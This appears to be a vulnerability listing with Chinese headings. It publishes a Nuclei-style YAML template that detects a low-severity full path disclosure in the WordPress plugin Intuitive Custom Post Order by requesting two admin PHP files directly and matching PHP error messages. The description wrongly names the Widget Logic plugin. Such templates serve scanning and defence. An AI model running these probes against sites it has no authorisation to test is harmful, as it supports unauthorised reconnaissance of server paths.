漏洞描述
WordPress Widget Logic plugin files are publicly accessible without ABSPATH protection, exposing sensitive server path information through PHP error messages when accessed directly.
wp-intuitive-custom-post-order-fpd: WordPress Plugin Intuitive Custom Post Order - Full Path Disclosure
PoC代码[已公开]
id: wp-intuitive-custom-post-order-fpd
info:
name: WordPress Plugin Intuitive Custom Post Order - Full Path Disclosure
author: DhiyaneshDk
severity: low
description: |
WordPress Widget Logic plugin files are publicly accessible without ABSPATH protection, exposing sensitive server path information through PHP error messages when accessed directly.
reference:
- https://wordpress.org/plugins/intuitive-custom-post-order/
metadata:
max-request: 1
verified: false
publicwww-query: "/plugins/intuitive-custom-post-order/"
tags: debug,wordpress,fpd,vuln,intuitive-custom-post-order,wp-plugin
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/intuitive-custom-post-order/admin/settings.php"
- "{{BaseURL}}/wp-content/plugins/intuitive-custom-post-order/admin/settings-network.php"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200 || status_code == 500'
- 'contains(body, "plugins/intuitive-custom-post-order/")'
- 'contains_all(body, "Fatal error", "Uncaught Error:") || contains_all(body, "Warning:","failed to open stream")'
condition: and
# digest: 4a0a00473045022100fcc794029a9bea3072f6d5b8360ef7973bcd3f68df56e66b436368d91875843f02204d0fe49d08fd704219e9b06de557a3b4d2ebe0ba94fbeea447ae8840738263ee:922c64590222798bb761d5b6d8e72950